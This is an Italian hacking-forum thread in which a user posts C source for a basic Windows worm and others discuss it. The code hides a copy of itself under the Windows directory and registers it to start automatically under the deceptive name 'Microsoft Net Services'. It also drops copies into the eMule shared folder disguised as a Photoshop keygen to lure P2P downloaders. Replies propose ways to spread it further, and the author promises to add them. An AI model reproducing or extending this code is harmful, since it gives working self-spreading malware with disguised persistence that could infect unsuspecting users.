basiliar Worm By MyDog

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
K

kr1pn0$

Utente Silver
14 Ottobre 2008
69
5
0
70
[align=center][size=xx-large]Basiliar Worm[/size][/align]
[align=right]by kr1pn05[/align]
Il mio obiettivo non è creare un nuovo beagle o mydoor, ma un semplice worm con le seguenti feature
  • Crea la cartella C:\windir\Netinit
  • Si copia dentro con il nome NetINIT.EXE
  • Scrive alcune chiavi nel registro per rassicurarsi l'eseguzione automatica
  • Si copia dentro incoming con il nome keygen photoshop cs3.exe
Codice: 
/*
  *****************************************
  *   Powered By Kr1pn05                  *
  *         MomoWorM                      *
  * Versione Nuova,riscritto da 0         *
  *****************************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <mapi.h>
// Inclusioni standart    
int install()
{
    /* elenco variabili
      path:   percorso del programma
      windir: Directory di windows
      target: Destinazione della copia
      newdir: Serve per la creazione delle directory
      
    */
    // Runtime installante
    // Controlla firma
    char path[256];
    char windir[MAX_PATH];
    char target[MAX_PATH];
    char newdir[MAX_PATH] = "mkdir ";
    char emuledir[255] = "C:\\Programmi\\eMule\\incoming\\keygen photoshop CS3.exe";
    char buffer[255];
    char buffer2[255];
    // Prendo le varie dir
    GetWindowsDirectory(windir, sizeof(windir));
    HMODULE hMe = GetModuleHandle(NULL);
    DWORD nRet = GetModuleFileName(hMe, path, 256);
    // Creo le cartelle
    strcpy(target, windir);
    strcat(target, "\\Netinit");
    strcat(newdir,target);
    system(newdir);
    strcat(target,"\\NetINIT.EXE");
    sprintf(buffer,"copy \"%s\" \"%s\"",path,target);
    system(buffer);
    // Scrittura nel registro
    HKEY software;
    HKEY key;
    RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\",&software);
    RegCreateKey(software,"RunServices",&key);
    RegSetValueEx(key,"Microsoft Net Services",NULL,REG_SZ,(LPBYTE)target,60);
    RegCloseKey(key);
    RegCloseKey(software);
    sprintf(buffer2,"copy \"%s\" \"%s\"",target, emuledir);
    system(buffer2);
}
int main()
{
    install();
    printf("Ciao\n");
    system("pause");
}
Azione malevole: Scrive ciao mondo! xD
 
RE: getLinux.P2P Worm By MyDog

no bhe avete ragione non sara un worm (vero e proprio) ma
Un worm (letteralmente "verme") è una particolare categoria di malware in grado di autoreplicarsi. È simile ad un virus, ma a differenza di questo non necessita di legarsi ad altri eseguibili per diffondersi
Clicca per espandere...
a me sembra che rispetti tale concetto,
per essere un worm mica deve per forza usare exploit o cazzate varie,
che comunque quando ho tempo lo trasformo in un vero worm xD
 
RE: getLinux.P2P Worm By MyDog

perchè sprecare tempo a fare ste cazzate !!!!!!!!!

vergogna ...:owned::owned::owned::vinnampoiecca::poverannuj:
 
RE: getLinux.P2P Worm By MyDog

[ot]
panhack ha detto:
perchè sprecare tempo a fare ste cazzate !!!!!!!!!

vergogna ...
Clicca per espandere...
scusa chi ti ha chiesto niente?
io ho fatto questo per allenarmi a usare le winapi
non volevo mica fare beagle o mydoor solo un semplicissimo worm basiliare
[/ot]
 
RE: getLinux.P2P Worm By MyDog

ci sono molti altri modi..per esercitarsi con le win api ;) ...serza dover creare uno stpido worm...:owned:
 
RE: getLinux.P2P Worm By MyDog

panhack ha detto:
ci sono molti altri modi..per esercitarsi con le win api ;) ...serza dover creare uno stpido worm...:owned:
Clicca per espandere...
:lol: hai ragione facendo un keylogger:owned: xD
no dai faro cose + sensate
 
RE: getLinux.P2P Worm By MyDog

Kripnos, a parte l'"allegro worm", non è che potresti passarmi, anche tramite mp un pò di documentazione sulle winAPI? Non che non voglia cercare, ma perlomeno inizio da materiale sicuramente valido^^
 
RE: getLinux.P2P Worm By MyDog

Io penso che ognuno sia libero di creare che caspita gli pare e piace. Inoltre in questo modo si esercita nella programmazione, e gli da soddisfazione.
Perciò penso che il suo sia un ottimo esercizio di allenamento. L' unico problema è che se l' utente non utilizza la cartella C:\Programmi\Emule\Incoming (80% dei casi) il worm va a farsi benedire. Inoltre da quello che ho visto non possiede una lista dei nomi dei programmi più comunemente utilizzati per aiutare la sua diffusione tramite il P2P. Potrei continuare ancora per molto, ma questo non è un dibattito sulla diffusione di virus nella rete. Detto tutto questo, complimenti ancora :)
 
RE: getLinux.P2P Worm By MyDog

Eijin ha detto:
Kripnos, a parte l'"allegro worm", non è che potresti passarmi, anche tramite mp un pò di documentazione sulle winAPI? Non che non voglia cercare, ma perlomeno inizio da materiale sicuramente valido^^
Clicca per espandere...
certo aspetta che lo cerco e ti invio...
PS: è un file rar

BrainStorm ha detto:
Io penso che ognuno sia libero di creare che caspita gli pare e piace. Inoltre in questo modo si esercita nella programmazione, e gli da soddisfazione.
Perciò penso che il suo sia un ottimo esercizio di allenamento. L' unico problema è che se l' utente non utilizza la cartella C:\Programmi\Emule\Incoming (80% dei casi) il worm va a farsi benedire. Inoltre da quello che ho visto non possiede una lista dei nomi dei programmi più comunemente utilizzati per aiutare la sua diffusione tramite il P2P. Potrei continuare ancora per molto, ma questo non è un dibattito sulla diffusione di virus nella rete. Detto tutto questo, complimenti ancora :)
Clicca per espandere...
si ma oggi lo perfezionero',
gli mettero una runtime di modifica di chiavi!
prendero la cartella incoming dal file di configurazione di emule, lo copiero con un nome casuale del tipo
photoshop CS3 keygen.exe
insomma lo mettero a posto
 
kripnos in ogni caso dove pazzo è l'autoreplicazione?? dato che la tua definizione di worm è ridotta solo a questo!
 
appunto mi sono dimenticato di postarla xD
posto subito...

ps: perchè e' tardi domani mettero che la posizione della cartella incoming la prende
da
C:\Programmi\eMule\config\preferences.ini
 
Stato
Discussione chiusa ad ulteriori risposte.
Top Bottom
Indietro